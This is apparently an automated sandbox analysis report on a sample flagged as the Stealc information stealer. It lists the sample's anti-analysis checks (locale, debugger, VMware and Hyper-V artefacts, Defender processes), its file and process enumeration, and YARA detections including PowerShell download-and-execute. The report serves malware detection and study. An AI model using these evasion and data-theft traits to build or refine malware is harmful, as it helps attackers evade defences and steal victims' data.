                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Found evasive API chain (may stop execution after checking locale)
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_2-26375
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeWindow / User API: threadDelayed 510Jump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeWindow / User API: threadDelayed 9481Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeEvaded block: after key decisiongraph_2-27536
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-65274
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeAPI coverage: 5.1 %
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeAPI coverage: 6.5 %
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe TID: 3220Thread sleep count: 510 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe TID: 3220Thread sleep time: -362610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe TID: 3220Thread sleep count: 9481 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe TID: 3220Thread sleep time: -6740991s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00438A12 FindFirstFileExW,0_2_00438A12
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A88C79 FindFirstFileExW,0_2_00A88C79
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0040E430
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,2_2_004138B0
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,2_2_00414570
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00414910
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,2_2_0040ED20
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,2_2_0040BE70
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040DE10
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_004016D0
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040DA80
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_00413EA0
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040F6B0
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022DE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_022DE697
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022E3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,2_2_022E3B17
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022E4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_022E4B77
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022DEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,2_2_022DEF87
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022E47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,2_2_022E47D7
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022DE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_022DE077
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022DDCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_022DDCE7
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022DF8F1 FindFirstFileA,2_2_022DF8F1
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022DC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,2_2_022DC0D7
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022D1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_022D1937
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022E4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_022E4107
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022DF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_022DF917
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_00401160 GetSystemInfo,ExitProcess,2_2_00401160
                  Source: Amcache.hve.5.drBinary or memory string: VMware
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: GK059kPZ5B.exe, 00000000.00000002.4555417767.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, GK059kPZ5B.exe, 00000000.00000002.4555417767.00000000008F7000.00000004.00000020.00020000.00000000.sdmp, A865.tmp.exe, 00000002.00000002.3069391688.0000000000873000.00000004.00000020.00020000.00000000.sdmp, A865.tmp.exe, 00000002.00000002.3069391688.00000000008C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: GK059kPZ5B.exe, 00000000.00000002.4555417767.00000000008F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                  Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: A865.tmp.exe, 00000002.00000002.3069391688.0000000000873000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                  Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26360
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26363
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26374
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26382
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26248
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26403
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-27788
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26202
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0042A3F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3F3
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_004045C0 VirtualProtect ?,00000004,00000100,000000002_2_004045C0
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0041EC7E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC7E
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0042FE7F mov eax, dword ptr fs:[00000030h]0_2_0042FE7F
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_008697B3 push dword ptr fs:[00000030h]0_2_008697B3
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A800E6 mov eax, dword ptr fs:[00000030h]0_2_00A800E6
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A5092B mov eax, dword ptr fs:[00000030h]0_2_00A5092B
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A50D90 mov eax, dword ptr fs:[00000030h]0_2_00A50D90
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_00419750 mov eax, dword ptr fs:[00000030h]2_2_00419750
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_00849AFB push dword ptr fs:[00000030h]2_2_00849AFB
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022D092B mov eax, dword ptr fs:[00000030h]2_2_022D092B
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022E99B7 mov eax, dword ptr fs:[00000030h]2_2_022E99B7
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022D0D90 mov eax, dword ptr fs:[00000030h]2_2_022D0D90
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0043BBE1 GetProcessHeap,0_2_0043BBE1
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0042A3F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3F3
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_004104F3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104F3
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00410686 SetUnhandledExceptionFilter,0_2_00410686
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0040F936 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F936
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A7A65A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A7A65A
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A6075A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A6075A
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A608ED SetUnhandledExceptionFilter,0_2_00A608ED
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A5FB9D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00A5FB9D
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0041AD48
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0041CEEA SetUnhandledExceptionFilter,2_2_0041CEEA
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041B33A
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022EAFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_022EAFAF
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022ED151 SetUnhandledExceptionFilter,2_2_022ED151
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022EB5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_022EB5A1
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeMemory protected: page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: Process Memory Space: A865.tmp.exe PID: 3640, type: MEMORYSTR
                  Searches for specific processes (likely to inject)
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_00419600
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022E9867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_022E9867
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeProcess created: C:\Users\user\AppData\Local\Temp\A865.tmp.exe "C:\Users\user\AppData\Local\Temp\A865.tmp.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0041079B cpuid 0_2_0041079B
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043B02A
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: GetLocaleInfoW,0_2_004351E0
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: EnumSystemLocalesW,0_2_0043B2ED
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: EnumSystemLocalesW,0_2_0043B2A2
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: EnumSystemLocalesW,0_2_0043B388
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B415
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: GetLocaleInfoW,0_2_0043B665
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B78E
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: GetLocaleInfoW,0_2_0043B895
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B962
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: EnumSystemLocalesW,0_2_00434DED
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: EnumSystemLocalesW,0_2_00A85054
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00A8B291
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: GetLocaleInfoW,0_2_00A85447
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: EnumSystemLocalesW,0_2_00A8B5EF
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: EnumSystemLocalesW,0_2_00A8B509
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: EnumSystemLocalesW,0_2_00A8B554
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: GetLocaleInfoW,0_2_00A8B8CC
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: GetLocaleInfoW,0_2_00A8B8C2
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00A8B9F5
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: GetLocaleInfoW,0_2_00A8BAFC
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00A8BBC9
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_00417B90
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_022E7DF7
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_004103ED GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103ED
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,2_2_00417850
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,2_2_00417A30
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0041640A GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_0041640A
                  Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Stealc
                  Source: Yara matchFile source: 2.2.A865.tmp.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.A865.tmp.exe.22d0e67.3.unpack, type: UNPACKEDPE
